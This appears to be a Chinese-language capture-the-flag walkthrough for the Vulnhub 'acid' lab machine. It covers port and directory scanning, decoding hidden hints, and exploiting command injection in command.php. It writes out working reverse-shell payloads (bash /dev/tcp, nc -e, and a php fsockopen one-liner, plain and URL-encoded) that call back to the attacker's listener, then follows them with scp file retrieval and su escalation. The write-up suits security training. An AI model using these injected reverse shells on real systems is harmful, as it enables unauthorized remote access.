Vulnhub靶机-acid

靶机下载

配置

使用Vmware中的kali和靶机，网络连接方式为桥接

信息收集

查看kali所在的IP地址和子网

root@kaliattack:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:75:0a:17 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.4/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
       valid_lft 76222sec preferred_lft 76222sec
    inet6 fe80::20c:29ff:fe75:a17/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

扫描靶机

root@kaliattack:~# nmap -sP 192.168.1.4/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-19 12:54 CST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0024s latency).
MAC Address: B4:DE:DF:5D:FE:70 (zte)
Nmap scan report for 192.168.1.2 (192.168.1.2)
Host is up (0.0023s latency).
MAC Address: FC:7C:02:9C:00:59 (Phicomm (Shanghai))
Nmap scan report for laptop-lkst0l6r (192.168.1.3)
Host is up (0.000077s latency).
MAC Address: 00:0E:C6:BB:D2:3F (Asix Electronics)
Nmap scan report for acid (192.168.1.5)
Host is up (0.00030s latency).
MAC Address: 00:0C:29:83:5A:CF (VMware)
Nmap scan report for kaliattack (192.168.1.4)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

靶机在 192.168.1.5，物理机在 192.168.1.3

扫描所有65535个端口，并做服务指纹识别

root@kaliattack:~# nmap -p1-65535 -sV 192.168.1.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 10:34 CST
Nmap scan report for acid (192.168.1.5)
Host is up (0.0028s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 00:0C:29:83:5A:CF (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.13 seconds

33447端口有web服务，apache 2.4.10。

扫描一下目录

dirb http://192.168.1.5:33447

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jan 20 12:08:54 2020
URL_BASE: http://192.168.1.5:33447/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.5:33447/ ----
==> DIRECTORY: http://192.168.1.5:33447/css/
==> DIRECTORY: http://192.168.1.5:33447/images/
+ http://192.168.1.5:33447/index.html (CODE:200|SIZE:899)
+ http://192.168.1.5:33447/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.1.5:33447/css/ ----

---- Entering directory: http://192.168.1.5:33447/images/ ----
+ http://192.168.1.5:33447/images/Thumbs.db (CODE:200|SIZE:31744)

-----------------
END_TIME: Mon Jan 20 12:09:02 2020
DOWNLOADED: 13836 - FOUND: 3

漏洞挖掘

查看index的网页源代码，最后一行有一串十六进制数字

<!--0x643239334c6d70775a773d3d-->

转换成字符串

d293LmpwZw==

base64解码

wow.jpg

访问一下wow.jpg，404，再看看上面的目录扫描结果，有个images目录，访问images/wow.jpg，看到了success。把这张图片保存下来，打开发现最后有一行

37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

转换成字符串

7aee0f6d588ed9905ee37f16a7c610d4

目测是md5，解密得到63425，大概就是密码了，但是没地方可用。

换Dirbuster再扫描目录（要用big的字典），能扫到一个Challenge目录（扫了也就一个多小时吧），能看到下面cake.php, error.php, hacked.php, include.php, index.php ，还有js，styles，css，less各种文件夹。

cake.php无法访问，index需要邮箱和密码登录，include.php有包含漏洞，但没有上传点。

包含cake.php，发现又一串神秘数字

<!--0x5933566a4c6e4a34626e413d-->

转字符串

Y3VjLnJ4bnA=

base64解码

cuc.rxnp

但是不知道它是干嘛的。

访问cake.php能看到title的位置有/Magic_Box，访问一下返回了403，再用DIrbuster爆破一轮，扫到了low.php，command.php， tails.php。

low是一个空页面，command有命令执行，tails要求输入secretkey，63425和cuc.rxnp都没有用。

command的命令执行输入192.168.1.4;ls，返回

PING 192.168.1.4 (192.168.1.4) 56(84) bytes of data.
64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=0.356 ms
64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=0.297 ms
64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=0.352 ms

--- 192.168.1.4 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.297/0.335/0.356/0.026 ms
command.php
command.php.save
command2.php.save
command2.php.save.1
low.php
proc
tails.php

存在命令执行

漏洞利用

反弹shell，先在kali上监听端口

nc -lvvp 4444

利用命令执行反弹shell，url编码192.168.1.4;bash -i >& /dev/tcp/192.168.1.4/4444 0>&1

%31%39%32%2E%31%36%38%2E%31%2E%34%3B%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%36%34%2E%31%2F%34%34%34%34%20%30%3E%26%31

没有收到，换nc，192.168.1.4;nc -e /bin/bash -d 192.168.1.4 4444

%31%39%32%2E%31%36%38%2E%31%2E%34%3B%6E%63%20%2D%65%20%2F%62%69%6E%2F%62%61%73%68%20%20%2D%64%20%31%39%32%2E%31%36%38%2E%31%2E%34%20%34%34%34%34

还不行，换php，192.168.1.4;php -r '$sock=fsockopen("192.168.1.4",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

%31%39%32%2e%31%36%38%2e%31%2e%34%3b%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%39%32%2e%31%36%38%2e%31%2e%34%22%2c%34%34%34%34%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27

成功收到反弹的shell

获取信息

su，提示must be run from a terminal。用python调用本地的shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

现在可以执行su了

cat /etc/passwd能发现acid用户，find / -user acid 2>/dev/null查找acid的文件，不输出错误，发现/sbin/raw_vs_isi/hint.pcapng，下载下来看一下

scp /sbin/raw_vs_isi/hint.pcapng root@192.168.1.4:/root/

查看这个包，发现saman and nowadays he's known as 1337hax0r，su saman，密码就是1337hax0r，同样的密码登录root，得到flag。

参考文章：安全客文章